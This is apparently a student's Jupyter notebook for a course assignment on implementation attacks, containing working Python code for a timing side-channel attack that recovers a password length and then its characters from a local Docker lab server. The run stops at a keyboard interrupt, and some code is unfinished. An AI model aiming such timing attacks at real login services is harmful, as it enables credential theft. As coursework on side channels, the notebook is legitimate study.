# Attacks on Implementations of Secure Systems Assignment 1

## Commands used for docker
`docker pull amarmic/attacks_on_implementations:Assignment1_x86_64`  
`docker run --name ass1 -p 80:8080 amarmic/attacks_on_implementations:Assignment1_x86_64`

## Commands used for Anaconda to test locally
`conda create --name side_attacks python=3.12`
`conda install requests`

### Imports

In [33]:
!pip install scipy

   ---------------------------------------- 0.0/40.9 MB ? eta -:--:--
    --------------------------------------- 0.5/40.9 MB 2.8 MB/s eta 0:00:15
   -- ------------------------------------- 2.1/40.9 MB 6.5 MB/s eta 0:00:06
   ---- ----------------------------------- 4.7/40.9 MB 9.2 MB/s eta 0:00:04
   ------- -------------------------------- 8.1/40.9 MB 11.4 MB/s eta 0:00:03
   ------------ --------------------------- 12.6/40.9 MB 13.6 MB/s eta 0:00:03
   ----------------- ---------------------- 17.8/40.9 MB 15.6 MB/s eta 0:00:02
   --------------------- ------------------ 21.5/40.9 MB 16.2 MB/s eta 0:00:02
   ------------------------ --------------- 24.9/40.9 MB 16.1 MB/s eta 0:00:01
   ---------------------------- ----------- 28.8/40.9 MB 16.6 MB/s eta 0:00:01
   -------------------------------- ------- 33.0/40.9 MB 16.9 MB/s eta 0:00:01
   ----------------------------------- ---- 36.7/40.9 MB 17.1 MB/s eta 0:00:01
   ---------------------------------------  40.9/40.9 MB 17.3 MB/s e

In [39]:
import requests
import time
from scipy import stats

### Constants

In [ ]:
base_url = "http://localhost"
name = "208009845"
difficulty = "1" # const for first difficuly
max_password_length = 32
amount_of_repeats = 3
possible_chars = "abcdefghijklmnopqrstuvwxyz"


## Solution for difficulty 1
With difficulty 1, the password length is variable, so we need first to find the length.


In [29]:
password = "parshandata"
response = requests.get(f"{base_url}/?user={name}&password={password}")
print("Response: ", response.url)
if response.status_code != 200 : # sanity check
  print("Error: ", response.status_code)

if response.text == "1":
   print("correct password")
else:
   print("incorrect password")

Response:  http://localhost/?user=208009845&password=parshandata
correct password


In [127]:
# Find length of password
# here we save the time of the query for each password length
vector_iterations = [[] for _ in range(max_password_length-1)]
for password_length in range(1,max_password_length): 
  password = "a" * password_length
  for iteration in range(amount_of_repeats):
    start = time.time()
    response = requests.get(f"{base_url}/?user={name}&password={password}")#&difficulty={difficulty}")
    end = time.time()
    if response.status_code != 200: # sanity check
      print("Error: ", response.status_code)
      break
    time_of_query = end - start
    vector_iterations[password_length-1].append(time_of_query)

# calculate avg time for each password length
password_length, max_avg = 0, 0
for i in range(len(vector_iterations)):
  vector_iterations[i] = sum(vector_iterations[i]) / len(vector_iterations[i])
  if vector_iterations[i] > max_avg:
    max_avg = vector_iterations[i]
    password_length = i+1
  
print(f"Password length: {password_length}, Time: {vector_iterations[password_length-1]}")

Password length: 11, Time: 0.5146199862162272


In [ ]:
import numpy as np

min_letters = 5
alpha = 0.0005
amount_of_repeats = 3

def majority_t_test(data, popmean):
  majority_list = []
  for iteration in range(amount_of_repeats):
    if t_test(data, popmean[iteration]):
      majority_list.append(True)
    else:
      majority_list.append(False)
  if majority_list.count(True) > amount_of_repeats // 2:
    return True
  return False
  
def t_test(data, popmean):
  flat_list = [item for sublist in data for item in sublist]
  t_stat, p_val = stats.ttest_1samp(flat_list, popmean, alternative='less')
  if p_val < alpha:
    return True
  return False

def remove_outliers(data):
    q25, q75 = np.percentile(data, 25), np.percentile(data, 75)
    iqr = q75 - q25
    return [x for x in data if (x <= q75 + 1.5 * iqr)]


def get_dynamic_alpha(password_so_far, min_alpha=0.005, max_alpha=0.0001):
    """
    Calculate a dynamic alpha value that becomes more strict as we discover more characters.
    
    Args:
        password_so_far: Currently discovered partial password
        min_alpha: Minimum allowed alpha value (lower bound)
        max_alpha: Maximum allowed alpha value (upper bound)
    
    Returns:
        Dynamically calculated alpha value
    """
    # Exponential decrease in alpha as password length increases
    # We become more strict (require stronger evidence) as we progress
    return max(min_alpha, max_alpha * (0.7 ** len(password_so_far)))
    
def find_password():
  password = "" # password to return
  while (len(password) <= password_length):
    max_time_index, max_time = 0, 0
    vector_iterations = [[] for _ in range(len(possible_chars))]
    current_index_of_password = len(password) #what index we are trying to brute force
    for index_char_to_check in range(len(possible_chars)):
      print(possible_chars[index_char_to_check], end="") #for debugging purposes
      password_to_check = password + possible_chars[index_char_to_check] * (password_length - current_index_of_password)
      for _ in range(amount_of_repeats):
        start = time.time()
        response = requests.get(f"{base_url}/?user={name}&password={password_to_check}")#&difficulty={difficulty}")
        end = time.time()
        if response.status_code == 200 and response.text == "1":
          return password_to_check
        vector_iterations[index_char_to_check].append(end - start)

        # perform t-test to see if it's an small outlier 
        #TODO
    
      #vector_iterations[index_char_to_check] = remove_outliers_and_avg(vector_iterations[index_char_to_check])

      


      if max(vector_iterations[index_char_to_check]) > max_time:
        max_time = max(vector_iterations[index_char_to_check])
        max_time_index = index_char_to_check
      

      if index_char_to_check == min_letters-1:
        found = False
        for i in range(min_letters):
          sample = vector_iterations[:i] + vector_iterations[i+1:min_letters]
          if majority_t_test(sample, vector_iterations[i]):
            password += possible_chars[i]
            print(f"\nPassword: {password}, time: {vector_iterations[i]}") #,p-value: {p_val}
            print(vector_iterations[:index_char_to_check+1])
            found = True
        if found: break
        else: continue

      # t-test
      if index_char_to_check > min_letters -1 and max_time_index == index_char_to_check:
        sample = vector_iterations[:index_char_to_check]
        if majority_t_test(sample, vector_iterations[index_char_to_check]):
          password += possible_chars[index_char_to_check]
          print(f"\nPassword: {password}, time: {vector_iterations[index_char_to_check]}") #,p-value: {p_val}
          print(vector_iterations[:index_char_to_check+1])
          break   
        
      
    else: #go back a letter  
        password = password[:-1]
        print("We did not find a char, the new password is: ", password)
  else:
    return "NOT_FOUND"

password = find_password()
print(f"Password: {password}")



abcde

KeyboardInterrupt: 